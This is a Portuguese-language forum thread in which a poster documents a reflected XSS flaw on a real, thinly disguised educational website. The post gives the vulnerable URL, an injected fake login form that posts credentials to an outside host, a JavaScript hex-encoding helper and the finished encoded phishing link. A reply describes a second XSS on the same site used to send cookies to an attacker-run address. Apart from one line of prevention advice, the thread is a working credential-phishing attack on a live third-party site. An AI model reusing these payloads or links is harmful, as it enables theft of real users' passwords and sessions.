Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

XSS + Engenharia Social, Estudo de caso + Tool

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Tempo
  • Show
Clear All
new posts
Anterior template Avançar
  • Font Size
    #1

    Matéria XSS + Engenharia Social, Estudo de caso + Tool

    Em outro post um colega falou que faz pentest em um site educacional, então como de costume resolvi olhar.
    O site é educacional PoNT0 c0m PONT0 be-érre.

    Percebi que a area do Blog do Pasquaaale só podia ser acessada por membros.
    Código:
    SITE/blog/wp/verificaDadosLogado.asp?tipo=2&end=blog_pasquale&owner=6037938
    Olhando isso notei que podia variar o blog_pasquale assim:
    Código:
    SITE/blog/wp/verificaDadosLogado.asp?tipo=2&end=<form action=http://site.com/login.php><input type=text><br><input type=password><input type=submit value=Entrar></form>
    e usando uma Tool para converter caracteres para hexadecimal que roda no Console de Javascript do nagevador:
    Código:
    function conversor(a) { final = ""; for(i=0;i<a.length;i++){final +="%"+a[i].charCodeAt(0).toString(16)} return final }
    Código:
    conversor('<form action=http://site.com/login.php><input type=text><br><input type=password><input type=submit value=Entrar></form>')
    Cheguei a isso:
    Código:
    SITE/blog/wp/verificaDadosLogado.asp?tipo=2&end=%3c%66%6f%72%6d%20%61%63%74%69%6f%6e%3d%68%74%74%70%3a%2f%2f%73%69%74%65%2e%63%6f%6d%2f%6c%6f%67%69%6e%2e%70%68%70%3e%3c%69%6e%70%75%74%20%74%79%70%65%3d%74%65%78%74%3e%3c%62%72%3e%3c%69%6e%70%75%74%20%74%79%70%65%3d%70%61%73%73%77%6f%72%64%3e%3c%69%6e%70%75%74%20%74%79%70%65%3d%73%75%62%6d%69%74%20%76%61%6c%75%65%3d%45%6e%74%72%61%72%3e%3c%2f%66%6f%72%6d%3e
    Um link que pode ser passado como alguma matéria do site que exige login mas que na verdade captura a senha. Logo depois de capturar a senha o atacante poderá redirecionar para um site qualquer do portal.

    Essa falha já vem sendo combatida pelos navegadores, no momento que fiz esse teste não funcionou no Chrome, somente no FIrefox.

    Se você for fazer um site não permita que os dados da URL interfiram no conteúdo, assim se previne esse tipo de problema.

    Obrigado pela atenção kkk
    Last edited by David Felipe; 02-09-2012, 13:42. Motivo: Troca de titulo a pedido do Autor!
    Tags: Nenhum(a)
    • Top
  • Font Size
    #2
    Caraca mano, consegui fazer XSS em uma outra página do site, mas tem que ta logado, é a página de tarefas do site, no botão Adicionar Filtros é só colocar um script que mande os cookies para um endereço que os grave. Valeu a dica.
    "Ninguém é tão grande que não possa aprender e tão pequeno que não possa ensinar."

    By : UnKnow

    • Top

    Comment

    Anterior template Avançar
    X
    Working...
    X